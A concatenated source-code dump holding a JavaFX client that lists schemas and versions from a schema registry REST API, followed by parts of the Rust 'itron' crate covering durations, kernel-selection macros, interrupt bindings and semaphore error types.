private MainModel model = new MainModel();
private SchemaModel schemaModel = new SchemaModel();
private VersionModel versionModel = new VersionModel();
@FXML // ResourceBundle that was given to the FXMLLoader
private ResourceBundle resources;
@FXML // URL location of the FXML file that was given to the FXMLLoader
private URL location;
@FXML
private TableView<Map<SchemaEnum, String>> schemaTable;
@FXML
private TableColumn<Map, String> idColumn;
@FXML
private TableColumn<Map, String> nameColumn;
@FXML
private TableColumn<Map, String> descColumn;
@FXML
private TableColumn<Map, String> typeColumn;
@FXML
private TableColumn<Map, String> compColumn;
@FXML
private Label versionsLabel;
@FXML
private ChoiceBox<String> choiceBox;
@FXML
private TableView<Map<VersionEnum, String>> versionTable;
@FXML
private TableColumn<Map, String> versionIdColumn;
@FXML
private TableColumn<Map, String> versionVersionColumn;
@FXML
private TableColumn<Map, String> versionShemaTextColumn;
@FXML // fx:id="registryMenu"
private Menu registryMenu; // Value injected by FXMLLoader
@FXML // fx:id="connectMenu"
private MenuItem connectMenu; // Value injected by FXMLLoader
@FXML
private Menu preferencesMenu;
@FXML // fx:id="quitMenu"
private MenuItem quitMenu; // Value injected by FXMLLoader
private Map<String, String> schemaRegistryProps = new HashMap<>();
private ReadOnlyObjectProperty<String> selectedBranch;
private ReadOnlyObjectProperty<Map<SchemaEnum, String>> selectedSchema;
public MainController() throws BackingStoreException { }
@FXML
void connectToRegistry(ActionEvent event) throws IOException {
Map<String, String> props = Dialogs.loadAndShowDialog("dialog-connect", HashMap<String, String>::new);
if (props.size() != 0 && props.containsKey("hostname") && props.containsKey("port")) {
model.addPreferences(props.get("hostname") + ":" + props.get("port"), props);
} else {
log.warning(String.format("Not enough connection parameters: %s", props));
return;
}
try {
connectToRegistry(props);
} catch (Exception e) {
log.throwing("MainController", "connectToRegistry", e);
}
}
void connectToRegistry(Map<String, String> props) {
Optional<Schemas> result = HttpUtil.Rest.of(props, "/api/v1/schemaregistry/schemas").execute(Schemas.class);
result.ifPresent(schemas -> {
updateCurrentRegistry(props);
schemaModel.getTable().clear();
for (SchemaMetadataInfo metadataInfo : schemas.entities) {
Map<SchemaEnum, String> map = new EnumMap<>(SchemaEnum.class);
map.put(SchemaEnum.ID, String.valueOf(metadataInfo.getId()));
map.put(SchemaEnum.NAME, metadataInfo.getSchemaMetadata().getName());
map.put(SchemaEnum.DESCRIPTION, metadataInfo.getSchemaMetadata().getDescription());
map.put(SchemaEnum.TYPE, metadataInfo.getSchemaMetadata().getType());
map.put(SchemaEnum.COMPATIBILITY, metadataInfo.getSchemaMetadata().getCompatibility().name());
schemaModel.getTable().add(map);
}
});
}
void getSchemaVersion(Map<SchemaEnum, String> metadata, String branch) {
Optional<SchemaVersions> result = HttpUtil.Rest.of(
schemaRegistryProps,
"/api/v1/schemaregistry/schemas/" + metadata.get(SchemaEnum.NAME) + "/versions",
"branch=" + branch)
.execute(SchemaVersions.class);
result.ifPresent(schemaVersions -> {
versionModel.getTable().clear();
for (SchemaVersionInfo schemaVersion : schemaVersions.entities) {
Map<VersionEnum, String> map = new EnumMap<>(VersionEnum.class);
map.put(VersionEnum.VERSION_ID, String.valueOf(schemaVersion.getId()));
map.put(VersionEnum.VERSION_VERSION, String.valueOf(schemaVersion.getVersion()));
map.put(VersionEnum.SCHEMATEXT, schemaVersion.getSchemaText());
versionModel.getTable().add(map);
}
});
}
private void getSchemaBranches(Map<SchemaEnum, String> metadata) {
Optional<SchemaBranches> result = HttpUtil.Rest.of(
schemaRegistryProps,
"/api/v1/schemaregistry/schemas/" + metadata.get(SchemaEnum.NAME) + "/branches")
.execute(SchemaBranches.class);
result.ifPresent(schemaBranches -> {
schemaModel.getBranchNames().clear();
for (SchemaBranch schemaBranch : schemaBranches.entities) {
schemaModel.getBranchNames().add(schemaBranch.getName());
}
choiceBox.getSelectionModel().selectFirst();
});
}
private void updateCurrentRegistry(Map<String, String> props) {
schemaRegistryProps.clear();
schemaRegistryProps.putAll(props);
}
@FXML
void quitFromApp(ActionEvent event) {
Platform.exit();
}
@FXML // This method is called by the FXMLLoader when initialization is complete
void initialize() throws BackingStoreException {
assert registryMenu != null : "fx:id=\"registryMenu\" was not injected: check your FXML file 'regfx-main.fxml'.";
assert connectMenu != null : "fx:id=\"connectMenu\" was not injected: check your FXML file 'regfx-main.fxml'.";
assert preferencesMenu != null : "fx:id=\"preferencesMenu\" was not injected: check your FXML file 'regfx-main.fxml'.";
assert quitMenu != null : "fx:id=\"quitMenu\" was not injected: check your FXML file 'regfx-main.fxml'.";
model.addPreferencesListener(createPrefsListener());
model.readPreferences();
schemaTable.setItems(schemaModel.getTable());
idColumn.setCellValueFactory(new MapValueFactory<String>(SchemaEnum.ID));
nameColumn.setCellValueFactory(new MapValueFactory<String>(SchemaEnum.NAME));
descColumn.setCellValueFactory(new MapValueFactory<String>(SchemaEnum.DESCRIPTION));
typeColumn.setCellValueFactory(new MapValueFactory<String>(SchemaEnum.TYPE));
compColumn.setCellValueFactory(new MapValueFactory<String>(SchemaEnum.COMPATIBILITY));
schemaTable.getSelectionModel().selectedItemProperty().addListener((observableValue, oldValue, newValue) -> {
getSchemaBranches(newValue);
getSchemaVersion(newValue, selectedBranch.getValue());
});
selectedSchema = schemaTable.getSelectionModel().selectedItemProperty();
versionTable.setItems(versionModel.getTable());
versionIdColumn.setCellValueFactory(new MapValueFactory<String>(VersionEnum.VERSION_ID));
versionVersionColumn.setCellValueFactory(new MapValueFactory<String>(VersionEnum.VERSION_VERSION));
versionShemaTextColumn.setCellValueFactory(new MapValueFactory<String>(VersionEnum.SCHEMATEXT));
versionsLabel.textProperty().bind(Bindings.size(versionModel.getTable()).asString());
choiceBox.setItems(schemaModel.getBranchNames());
choiceBox.getSelectionModel().selectedItemProperty().addListener((observableValue, oldValue, newValue) -> {
getSchemaVersion(selectedSchema.get(), newValue);
});
selectedBranch = choiceBox.getSelectionModel().selectedItemProperty();
}
private MapChangeListener<? super String,? super Map<String, String>> createPrefsListener() {
return chg -> {
if (chg.wasAdded()) {
addMenuItem(chg.getKey(), chg.getValueAdded());
} else if (chg.wasRemoved()) {
preferencesMenu.getItems().removeIf(mi -> mi.getText().contains(chg.getKey()));
}
};
}
private void addMenuItem(String key, Map<String, String> props) {
MenuItem connectItem = new MenuItem("Connect to " + key);
connectItem.setOnAction(event -> connectToRegistry(props));
MenuItem deleteItem = new MenuItem("Delete " + key);
deleteItem.setOnAction(event -> model.removePreferences(key));
preferencesMenu.getItems().addAll(connectItem, deleteItem);
}
}
<file_sep>package regfx.model;
import javafx.collections.FXCollections;
import javafx.collections.ObservableList;
import java.util.ArrayList;
import java.util.Optional;
import java.util.stream.Collectors;
public class ConnectModel {
private final ObservableList<String> parameters =
FXCollections.unmodifiableObservableList(
FXCollections.observableArrayList(
"hostname",
"port",
"path")
);
private final ObservableList<Pair<String, String>> tablerows = FXCollections.observableArrayList();
public ObservableList<String> getParameters() {
return parameters;
}
public Optional<String> getUnusedParameter() {
ArrayList<String> unusedParams = new ArrayList<String>(parameters);
unusedParams.removeAll(tablerows.stream()
.map(Pair::getKey)
.collect(Collectors.toUnmodifiableList()));
return unusedParams.stream().findFirst();
}
public ObservableList<Pair<String, String>> getTablerows() {
return tablerows;
}
}
<file_sep># registry-fx
Java FX toy project to fetch content from Schema registry.
<file_sep>module regfx {
requires javafx.controls;
requires javafx.fxml;
requires java.logging;
requires java.prefs;
requires java.net.http;
requires schema.registry.common;
requires com.fasterxml.jackson.databind;
opens regfx to javafx.fxml;
opens regfx.dialogs to javafx.fxml;
opens regfx.model to javafx.base, com.fasterxml.jackson.databind;
exports regfx;
}
<file_sep>handlers= java.util.logging.FileHandler
.level= INFO
java.util.logging.FileHandler.level = INFO
java.util.logging.FileHandler.formatter = java.util.logging.SimpleFormatter
regfx.handlers = java.util.logging.FileHandler<file_sep>package regfx.model;
public enum SchemaEnum {
ID, NAME, DESCRIPTION, TYPE, COMPATIBILITY;
}
<file_sep>package regfx.model;
public enum VersionEnum {
VERSION_ID, VERSION_VERSION, SCHEMATEXT
}
| 050eb2bc979702ea77ce49c651894598bfcf22a9 | [
"Markdown",
"Java",
"INI"
] | 8 | Java | heritamas/registry-fx | 33668f55217e6fa1c3fd95fb1a8155959bfbf264 | c8ce19b89aa3c315f086047b48d52994c80cc536 |
refs/heads/master | <repo_name>shiratsu/fir-hiratsuka<file_sep>/functions/index.js
const functions = require('firebase-functions');
const express = require('express');
const path = require('path');
const app = express();
const indexRouter = require('./routes/index');
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'jade');
app.use(express.json());
app.use(express.urlencoded({
extended: false
}));
app.use(express.static(path.join(__dirname, 'routes')));
app.use('/', indexRouter);
app.get('/api', (req, res) => {
const date = new Date();
const hours = (date.getHours() % 12) + 1; // London is UTC + 1hr;
res.json({
bongs: 'BONG '.repeat(hours)
});
});
exports.app = functions.https.onRequest(app); | 42cc4efa36b048574869f237ea5feb695a304310 | [
"JavaScript"
] | 1 | JavaScript | shiratsu/fir-hiratsuka | 2cdc4e6de0f7005027250800e53b160d31ed5e0c | 6c04b1e13c405a6df510b54dbc970ea74c047965 |
refs/heads/main | <repo_name>kawadakk/itron-rs<file_sep>/src/time/duration.rs
use crate::abi;
use core::{convert::TryFrom, time::Duration as StdDuration};
use super::Timeout;
/// A valid relative time value ([`abi::RELTIM`]).
#[cfg_attr(
feature = "nightly",
doc = "[`duration!`] can be used to construct a `Duration` in a concise syntax."
)]
#[cfg_attr(
not(feature = "nightly"),
doc = "If `nightly` feature is enabled, \
`duration!` can be used to construct a `Duration` in a concise syntax."
)]
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Hash)]
#[repr(transparent)]
pub struct Duration {
value: abi::RELTIM,
}
impl Duration {
/// The zero duration, which causes polling.
// Safety: It's a valid duration value
pub const ZERO: Self = unsafe { Self::from_raw(0) };
/// Construct a new `Duration` from a raw value.
///
/// # Safety
///
/// `value` must be a valid duration value. This crate treats `E_PAR` caused
/// by invalid duration values as a [critical error].
///
/// [critical error]: crate::error
#[inline]
pub const unsafe fn from_raw(value: abi::RELTIM) -> Self {
Self { value }
}
#[inline]
pub const fn as_raw(self) -> abi::RELTIM {
self.value
}
/// Construct a new `Duration` from the specified number of seconds.
///
/// Returns `None` if the specified duration is not representable.
#[inline]
pub const fn from_secs(secs: u64) -> Option<Self> {
if secs > u64::MAX / 1_000_000 {
None
} else {
Self::from_micros(secs * 1_000_000)
}
}
/// Construct a new `Duration` from the specified number of milliseconds.
///
/// Returns `None` if the specified duration is not representable.
#[inline]
pub const fn from_millis(millis: u64) -> Option<Self> {
if millis > u64::MAX / 1_000 {
None
} else {
Self::from_micros(millis * 1_000)
}
}
/// Construct a new `Duration` from the specified number of microseconds.
///
/// Returns `None` if the specified duration is not representable.
#[inline]
pub const fn from_micros(micros: u64) -> Option<Self> {
match () {
() => {
if micros > abi::TMAX_RELTIM as u64 {
None
} else {
// Safety: It's a valid duration value
Some(unsafe { Self::from_raw(micros as u32) })
}
}
}
}
/// Construct a new `Duration` from the specified number of nanoseconds.
///
/// Returns `None` if the specified duration is not representable.
#[inline]
pub fn from_nanos(nanos: u128) -> Option<Self> {
// TODO: make it `const fn`
u64::try_from(nanos / 1_000)
.ok()
.and_then(Self::from_micros)
}
}
impl TryFrom<StdDuration> for Duration {
type Error = super::TryFromDurationError;
#[inline]
fn try_from(d: StdDuration) -> Result<Self, Self::Error> {
Self::from_nanos(d.as_nanos()).ok_or(super::TryFromDurationError(()))
}
}
impl TryFrom<Timeout> for Duration {
type Error = super::TryFromDurationError;
#[inline]
fn try_from(d: Timeout) -> Result<Self, Self::Error> {
match () {
() => {
// In TOPPERS 3rd gen kernel, both types use the same range
if d.is_finite() {
// Safety: It's a valid timeout value
Ok(unsafe { Self::from_raw(d.as_raw()) })
} else {
Err(super::TryFromDurationError(()))
}
}
}
}
}
/// Construct a [`Duration`] value in a concise syntax. Panics if the specified
/// duration cannot be represented by `Duration`.
///
/// # Examples
///
/// ```
/// use itron::time::{duration, Duration};
/// assert_eq!(Duration::ZERO, duration!(0));
/// assert_eq!(Duration::from_millis(42).unwrap(), duration!(ms: 42));
/// ```
///
/// Panics if the value is out of range:
///
/// ```should_panic
/// # use itron::time::duration;
/// let _ = duration!(s: 0x7ffffffffffffff * 2);
/// ```
///
/// Once [`inline_const`] lands, it will be possible to do the check at
/// compile-time:
///
/// ```compile_fail
/// #![feature(inline_const)]
/// # use itron::time::duration;
/// let _ = const { duration!(s: 0x7ffffffffffffff * 2) };
/// ```
///
/// Literal values are validated at compile-time regardless of whether
/// `const { ... }` is used or not:
///
/// ```compile_fail
/// # use itron::time::duration;
/// let _ = duration!(s: 0xfffffffffffffff);
/// ```
///
/// ```should_panic
/// # use itron::time::duration;
/// // Wrap the expression with `( ... )` to avoid the above behavior and
/// // cause a runtime panic.
/// let _ = duration!(s: (0xfffffffffffffff));
/// ```
///
/// [`inline_const`]: https://rust-lang.github.io/rfcs/2920-inline-const.html
#[cfg(feature = "nightly")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "nightly")))]
pub macro duration {
// Compile-time checked literals
($kind:tt: $value:literal) => {{
const VALUE: $crate::time::Duration = $crate::time::duration!($kind: ($value));
VALUE
}},
// Seconds
(s: $value:expr) => {
$crate::time::expect_valid_duration($crate::time::Duration::from_secs($value))
},
// Milliseconds
(ms: $value:expr) => {
$crate::time::expect_valid_duration($crate::time::Duration::from_millis($value))
},
// Microseconds
(us: $value:expr) => {
$crate::time::expect_valid_duration($crate::time::Duration::from_micros($value))
},
// Microseconds
(μs: $value:expr) => {
$crate::time::expect_valid_duration($crate::time::Duration::from_micros($value))
},
// Nanoseconds
(ns: $value:expr) => {
$crate::time::expect_valid_duration($crate::time::Duration::from_nanos($value))
},
// Zero
(0) => { $crate::time::Duration::ZERO },
}
/// Panics if the specified `Option<Duration>` is `None`. Used by `duration!`.
#[cfg(feature = "nightly")]
#[doc(hidden)]
#[track_caller]
#[inline]
pub const fn expect_valid_duration(x: Option<Duration>) -> Duration {
if let Some(x) = x {
x
} else {
// Panics in `const fn` are unstable at the point of writing
let zero = 0u32;
#[allow(unconditional_panic)]
let __the_specified_timeout_is_invalid_or_not_representable__ = 1 / zero;
#[allow(clippy::empty_loop)]
loop {}
}
}
<file_sep>/tests/abi/fmp3.rs
//! Based on TOPPERS/FMP3 (Release 3.2) `kernel.h`
use super::symbols;
pub struct Abi;
impl super::KernelAbi for Abi {
fn get_symbols(&self, b: &mut super::SymbolsBuilder) {
b.insert_func(symbols::known_funcs::act_tsk);
b.insert_func(symbols::known_funcs::mact_tsk);
b.insert_func(symbols::known_funcs::can_act);
b.insert_func(symbols::known_funcs::mig_tsk);
b.insert_func(symbols::known_funcs::get_tst);
b.insert_func(symbols::known_funcs::chg_pri);
b.insert_func(symbols::known_funcs::get_pri);
b.insert_func(symbols::known_funcs::get_inf);
b.insert_func(symbols::known_funcs::chg_spr);
b.insert_func(symbols::known_funcs::ref_tsk);
b.insert_func(symbols::known_funcs::slp_tsk);
b.insert_func(symbols::known_funcs::tslp_tsk);
b.insert_func(symbols::known_funcs::wup_tsk);
b.insert_func(symbols::known_funcs::can_wup);
b.insert_func(symbols::known_funcs::rel_wai);
b.insert_func(symbols::known_funcs::sus_tsk);
b.insert_func(symbols::known_funcs::rsm_tsk);
b.insert_func(symbols::known_funcs::dly_tsk);
b.insert_func(symbols::known_funcs::ext_tsk);
b.insert_func(symbols::known_funcs::ras_ter);
b.insert_func(symbols::known_funcs::dis_ter);
b.insert_func(symbols::known_funcs::ena_ter);
b.insert_func(symbols::known_funcs::sns_ter);
b.insert_func(symbols::known_funcs::ter_tsk);
b.insert_func(symbols::known_funcs::sig_sem);
b.insert_func(symbols::known_funcs::wai_sem);
b.insert_func(symbols::known_funcs::pol_sem);
b.insert_func(symbols::known_funcs::twai_sem);
b.insert_func(symbols::known_funcs::ini_sem);
b.insert_func(symbols::known_funcs::ref_sem);
b.insert_func(symbols::known_funcs::set_flg);
b.insert_func(symbols::known_funcs::clr_flg);
b.insert_func(symbols::known_funcs::wai_flg);
b.insert_func(symbols::known_funcs::pol_flg);
b.insert_func(symbols::known_funcs::twai_flg);
b.insert_func(symbols::known_funcs::ini_flg);
b.insert_func(symbols::known_funcs::ref_flg);
b.insert_func(symbols::known_funcs::snd_dtq);
b.insert_func(symbols::known_funcs::psnd_dtq);
b.insert_func(symbols::known_funcs::tsnd_dtq);
b.insert_func(symbols::known_funcs::fsnd_dtq);
b.insert_func(symbols::known_funcs::rcv_dtq);
b.insert_func(symbols::known_funcs::prcv_dtq);
b.insert_func(symbols::known_funcs::trcv_dtq);
b.insert_func(symbols::known_funcs::ini_dtq);
b.insert_func(symbols::known_funcs::ref_dtq);
b.insert_func(symbols::known_funcs::snd_pdq);
b.insert_func(symbols::known_funcs::psnd_pdq);
b.insert_func(symbols::known_funcs::tsnd_pdq);
b.insert_func(symbols::known_funcs::rcv_pdq);
b.insert_func(symbols::known_funcs::prcv_pdq);
b.insert_func(symbols::known_funcs::trcv_pdq);
b.insert_func(symbols::known_funcs::ini_pdq);
b.insert_func(symbols::known_funcs::ref_pdq);
b.insert_func(symbols::known_funcs::loc_mtx);
b.insert_func(symbols::known_funcs::ploc_mtx);
b.insert_func(symbols::known_funcs::tloc_mtx);
b.insert_func(symbols::known_funcs::unl_mtx);
b.insert_func(symbols::known_funcs::ini_mtx);
b.insert_func(symbols::known_funcs::ref_mtx);
b.insert_func(symbols::known_funcs::loc_spn);
b.insert_func(symbols::known_funcs::unl_spn);
b.insert_func(symbols::known_funcs::try_spn);
b.insert_func(symbols::known_funcs::ref_spn);
b.insert_func(symbols::known_funcs::get_mpf);
b.insert_func(symbols::known_funcs::pget_mpf);
b.insert_func(symbols::known_funcs::tget_mpf);
b.insert_func(symbols::known_funcs::rel_mpf);
b.insert_func(symbols::known_funcs::ini_mpf);
b.insert_func(symbols::known_funcs::ref_mpf);
b.insert_func(symbols::known_funcs::set_tim);
b.insert_func(symbols::known_funcs::get_tim);
b.insert_func(symbols::known_funcs::adj_tim);
b.insert_func(symbols::known_funcs::fch_hrt);
b.insert_func(symbols::known_funcs::sta_cyc);
b.insert_func(symbols::known_funcs::msta_cyc);
b.insert_func(symbols::known_funcs::stp_cyc);
b.insert_func(symbols::known_funcs::ref_cyc);
b.insert_func(symbols::known_funcs::sta_alm);
b.insert_func(symbols::known_funcs::msta_alm);
b.insert_func(symbols::known_funcs::stp_alm);
b.insert_func(symbols::known_funcs::ref_alm);
b.insert_func(symbols::known_funcs::rot_rdq);
b.insert_func(symbols::known_funcs::mrot_rdq);
b.insert_func(symbols::known_funcs::get_tid);
b.insert_func(symbols::known_funcs::get_pid);
b.insert_func(symbols::known_funcs::get_lod);
b.insert_func(symbols::known_funcs::mget_lod);
b.insert_func(symbols::known_funcs::get_nth);
b.insert_func(symbols::known_funcs::mget_nth);
b.insert_func(symbols::known_funcs::loc_cpu);
b.insert_func(symbols::known_funcs::unl_cpu);
b.insert_func(symbols::known_funcs::dis_dsp);
b.insert_func(symbols::known_funcs::ena_dsp);
b.insert_func(symbols::known_funcs::sns_ctx);
b.insert_func(symbols::known_funcs::sns_loc);
b.insert_func(symbols::known_funcs::sns_dsp);
b.insert_func(symbols::known_funcs::sns_dpn);
b.insert_func(symbols::known_funcs::sns_ker);
b.insert_func(symbols::known_funcs::ext_ker);
b.insert_func(symbols::known_funcs::dis_int);
b.insert_func(symbols::known_funcs::ena_int);
b.insert_func(symbols::known_funcs::clr_int);
b.insert_func(symbols::known_funcs::ras_int);
b.insert_func(symbols::known_funcs::prb_int);
b.insert_func(symbols::known_funcs::chg_ipm);
b.insert_func(symbols::known_funcs::get_ipm);
b.insert_func(symbols::known_funcs::xsns_dpn);
}
}
<file_sep>/tests/abi/main.rs
//! This test checks that `itron::abi`'s contents exactly match what the target
//! kernel provides.
//!
//! Note: This test is a little bit tricky to get working. `target/debug` must
//! be ridden of other copies of `itron*.rlib` compiled with different Cargo
//! feature sets.
#![cfg(not(feature = "none"))]
use std::{collections::HashSet, env, fmt::Write, fs, path::Path};
mod symbols;
trait KernelAbi {
fn get_symbols(&self, b: &mut SymbolsBuilder);
}
#[derive(Default)]
struct SymbolsBuilder {
// For now we are only interested in function names
func_names: HashSet<&'static str>,
}
impl SymbolsBuilder {
fn insert_func(&mut self, f: symbols::Func) {
self.func_names.insert(f.name);
}
}
// Target kernels' ABI definitions
#[cfg(feature = "asp3")]
mod asp3;
#[cfg(feature = "asp3")]
use asp3 as os;
#[cfg(feature = "solid_asp3")]
mod solid_asp3;
#[cfg(feature = "solid_asp3")]
use solid_asp3 as os;
#[cfg(feature = "fmp3")]
mod fmp3;
#[cfg(feature = "fmp3")]
use fmp3 as os;
#[cfg(feature = "solid_fmp3")]
mod solid_fmp3;
#[cfg(feature = "solid_fmp3")]
use solid_fmp3 as os;
#[test]
fn abi_function_set() {
let actual_abi = os::Abi;
// Get the target kernel's provided symbols
let mut actual_symbols = SymbolsBuilder::default();
actual_abi.get_symbols(&mut actual_symbols);
// Enumerate functions that are not supposed to exist
let all_func_names: HashSet<&'static str> =
symbols::known_funcs::ALL_NAMES.iter().cloned().collect();
let bad_func_names = (&all_func_names) - (&actual_symbols.func_names);
println!(
"actual_symbols.func_names = {:?}",
actual_symbols.func_names
);
println!(
"bad_func_names (expected not to be in `itron::abi`) = {:?}",
bad_func_names
);
// Generate compile tests in `$OUT_DIR`
let out_dir = env::var_os("OUT_DIR").unwrap();
let out_dir = Path::new(&out_dir);
let pass_dir = out_dir.join("abi-test-pass");
let fail_dir = out_dir.join("abi-test-fail");
let _ = fs::remove_dir_all(&pass_dir);
let _ = fs::remove_dir_all(&fail_dir);
fs::create_dir_all(&pass_dir).unwrap();
fs::create_dir_all(&fail_dir).unwrap();
macro_rules! codegen {
($dollar:tt $($tt:tt)*) => {{
let mut rs = String::new();
macro_rules! wln { ($dollar($tt2:tt)*) => { writeln!(rs, $dollar($tt2)*).unwrap() }; }
$($tt)*
rs
}};
}
let pass_test = codegen! {$
wln!("fn main() {{");
for &func_name in actual_symbols.func_names.iter() {
wln!(" let _ = itron::abi::{};", func_name);
}
wln!("}}");
};
fs::write(pass_dir.join("func_names.rs"), pass_test).unwrap();
let fail_test = codegen! {$
wln!("fn main() {{");
for &func_name in bad_func_names.iter() {
wln!(" let _ = itron::abi::{0}; //~ ERROR cannot find value `{0}` in module `itron::abi`", func_name);
}
wln!("}}");
};
fs::write(fail_dir.join("func_names.rs"), fail_test).unwrap();
// Run compile tests
let flags = "--edition=2018 --extern itron";
{
let mut config = compiletest::Config::default();
config.mode = compiletest::common::Mode::RunPass;
config.target_rustcflags = Some(flags.to_string());
config.src_base = pass_dir.to_owned();
config.link_deps();
config.clean_rmeta();
compiletest::run_tests(&config);
}
{
let mut config = compiletest::Config::default();
config.mode = compiletest::common::Mode::CompileFail;
config.target_rustcflags = Some(flags.to_string());
config.src_base = fail_dir.to_owned();
config.link_deps();
config.clean_rmeta();
compiletest::run_tests(&config);
}
}
<file_sep>/src/macros.rs
//! Provides macros that allow downstream crates to examine the choice of
//! the target kernel.
//!
//! This module's macros whose names start with `tt_` follow `tt-call`'s token
//! tree calling convention.
include!(concat!(env!("OUT_DIR"), "/macros.rs"));
// Make `tt_call` available to the following macros' expansion
#[doc(hidden)]
pub use tt_call;
/// Expand to the current kernel's name (e.g., `"asp3"`).
///
/// # Examples
///
/// ```rust
/// println!("We are running on {}", itron::macros::kernel!());
/// ```
///
/// ```rust,compile_fail
/// compile_error!(concat!("kernel `", itron::macros::kernel!(), "` is not supported"));
/// ```
pub macro kernel() {
tt_call::tt_call! { macro = [{ itron::macros::tt_kernel }] }
}
/// Expand to the arm corresponding to the current kernel.
///
/// # Example
///
/// ```rust
/// itron::macros::match_kernel! {
/// "asp3" | "solid_asp3" => { fn say() { println!("We are running on TOPPERS/ASP3, yay!"); } }
/// "nonexistent_kernel" => { call_nonexistent_function(); }
/// _ => { fn say() { println!("This kernel looks like something new!"); } }
/// }
/// say();
/// ```
///
/// The arms don't create local scopes, and unselected arms are eliminated
/// during an early stage of compilation. Compare to the following example:
///
/// ```rust,compile_fail
/// match itron::macros::kernel!() {
/// "asp3" | "solid_asp3" => { fn say() { println!("We are running on TOPPERS/ASP3, yay!"); } }
/// "nonexistent_kernel" => { call_nonexistent_function(); }
/// // ERROR: `call_nonexistent_function` is undefined
/// _ => { fn say() { println!("This kernel looks like something new!"); } }
/// }
/// say(); // ERROR: Each arm's `say` is not accessible from here
/// ```
///
pub macro match_kernel {
(
_ => { $($wildcard:tt)* }
) => { $($wildcard)* },
(
_ => { $($wildcard:tt)* }
$($rest:tt)*
) => {
compile_error!("anything that follow `_ => { ... }` never match")
},
(
$( $kernel:tt )|+ => { $($tt:tt)* }
$($rest:tt)*
) => {
tt_call::tt_if! {
condition = [{ $crate::macros::tt_is_kernel }]
input = [{ $( $kernel )|+ }]
true = [{ $($tt)* }]
false = [{
match_kernel! { $($rest)* }
}]
}
},
}
<file_sep>/src/abi/intr.rs
use super::{bool_t, ER, ER_BOOL, INTNO, PRI};
/*
* 処理単位の型定義
*/
pub type ISR = Option<unsafe extern "C" fn(super::EXINF)>;
/*
* その他の定数の定義
*/
/// 割込み優先度マスク全解除
pub const TIPM_ENAALL: PRI = 0;
/// TOPPERS/ASP3 and SOLID/FMP3 `T_CISR`
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Clone, Copy)]
#[repr(C)]
pub struct T_CISR {
/// 割込みサービスルーチン属性
pub isratr: super::ATR,
/// 割込みサービスルーチンの拡張情報
pub exinf: super::EXINF,
/// 割込みサービスルーチンを登録する割込み番号
pub intno: INTNO,
/// 割込みサービスルーチンの先頭番地
pub isr: ISR,
/// 割込みサービスルーチン優先度
pub isrpri: PRI,
}
/// 割込み管理機能
#[cfg(any(
feature = "asp3",
feature = "fmp3",
feature = "solid_asp3",
feature = "solid_fmp3"
))]
extern "C" {
pub fn dis_int(intno: INTNO) -> ER;
pub fn ena_int(intno: INTNO) -> ER;
pub fn clr_int(intno: INTNO) -> ER;
pub fn ras_int(intno: INTNO) -> ER;
pub fn prb_int(intno: INTNO) -> ER_BOOL;
pub fn chg_ipm(intpri: PRI) -> ER;
pub fn get_ipm(p_intpri: *mut PRI) -> ER;
}
/// 割込み管理機能
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
extern "C" {
pub fn acre_isr(pk_cisr: *const T_CISR) -> super::ER_ID;
pub fn del_isr(isrid: super::ID) -> ER;
}
/// CPU例外管理機能
#[cfg(any(
feature = "asp3",
feature = "fmp3",
feature = "solid_asp3",
feature = "solid_fmp3"
))]
extern "C" {
pub fn xsns_dpn(p_excinf: *mut u8) -> bool_t;
}
<file_sep>/src/semaphore.rs
//! Semaphores
use core::{fmt, marker::PhantomData, mem::MaybeUninit};
use crate::{
abi,
error::{Error, ErrorCode, ErrorKind, Kind},
time::Timeout,
};
define_error_kind! {
/// Error type for [`SemaphoreRef::signal`].
pub enum SignalError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
QueueOverflow,
}
}
impl ErrorKind for SignalError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_QOVR => Some(Self::QueueOverflow(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`SemaphoreRef::wait`].
pub enum WaitError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
#[cfg(all(not(feature = "none"), feature = "dcre"))]
Deleted,
}
}
impl ErrorKind for WaitError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "dcre"))]
abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`SemaphoreRef::wait_timeout`].
pub enum WaitTimeoutError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Timeout,
#[cfg(not(feature = "none"))]
Released,
